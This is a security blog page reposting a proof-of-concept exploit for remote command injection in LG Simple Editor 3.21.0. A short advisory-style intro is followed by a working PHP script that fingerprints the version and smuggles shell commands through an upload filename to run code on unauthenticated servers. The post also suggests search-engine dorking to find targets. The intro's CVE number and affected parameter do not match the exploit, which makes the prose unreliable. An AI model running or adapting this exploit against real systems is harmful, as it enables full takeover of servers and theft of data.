Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

LG Simple Editor 3.21.0 Remote Command Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 42
LG Simple Editor version 3.21.0 is affected by a critical LG Simple Editor version 3.21.0 is affected by a critical Remote Command Injection (RCI) vulnerability. Identified as CVE-2023-45592, this flaw arises from insufficient sanitization of user-supplied input, specifically within the `project_name` parameter during project creation or saving.

An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary operating system commands on the server hosting the editor. This grants the attacker full control over the compromised system, potentially leading to data theft, system disruption, or further network penetration.

As of now, there is no official patch or update from LG to address this vulnerability. Users are strongly advised to discontinue using LG Simple Editor 3.21.0 and earlier versions, or isolate it from untrusted networks, to prevent exploitation.

=============================================================================================================================================
| # Title : LG Simple Editor 3.21.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.lg.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: LG Simple Editor Remote Command Injection Exploit Supports both Windows and Linux systems.

( https://packetstorm.news/files/id/180171/ CVE-2023-40504)

[+] save code as poc.php.

[+] Set Target : line 87

[+] USage : php poc.php

[+] PayLoad :

<?php

/**
* LG Simple Editor PHP Code Injection Exploit (CVE-2023-40504)
* Author: [indoushka]
*/

class LGSimpleEditorExploit
{
private $target;
private $port;

public function __construct($target, $port = 8080)
{
$this->target = rtrim($target, '/');
$this->port = $port;
}

public function checkVulnerability()
{
$url = "$this->target:$this->port/simpleeditor/common/commonReleaseNotes.do";
$response = $this->sendRequest('GET', $url);

if (!$response) {
return "Unknown - Could not connect to web service - no response";
}

preg_match('/v([0-9.]+)/', $response, $matches);
$version = isset($matches[1]) ? $matches[1] : 'Unknown';

if ($version === 'Unknown') {
return "Unknown";
}

return version_compare($version, '3.21.0', '<=') ? "Vulnerable (Version: $version)" : "Safe";
}

public function exploit($command)
{
echo "Sending command injection...\n";
$this->executeCommand($command);
echo "Exploit finished, check thy shell.\n";
}

private function executeCommand($command)
{
$filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(1, 6));
$boundary = "----WebKitFormBoundary" . md5(time());

$payload = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? "cmd.exe /c $command" : "/bin/sh -c '$command'";

$postData = "--$boundary\r\n";
$postData .= "Content-Disposition: form-data; name=\"uploadVideo\"; filename=\"$filename.mp4\"\r\n";
$postData .= "Content-Type: application/octet-stream\r\n\r\n";
$postData .= "/\"&#$payload&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del $filename.mp4&/../\r\n";
$postData .= "--$boundary--\r\n";

$url = "$this->target:$this->port/simpleeditor/imageManager/uploadVideo.do";
$response = $this->sendRequest('POST', $url, $postData, $boundary);

if ($response) {
echo "Command injection sent.\n";
} else {
die("Unexpected response received.\n");
}
}

private function sendRequest($method, $url, $data = null, $boundary = null)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($data) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Content-Type: multipart/form-data; boundary=$boundary"
]);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
}

// Example usage:
$exploit = new LGSimpleEditorExploit('http://target-ip');
echo $exploit->checkVulnerability() . "\n";
$exploit->exploit('whoami');

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share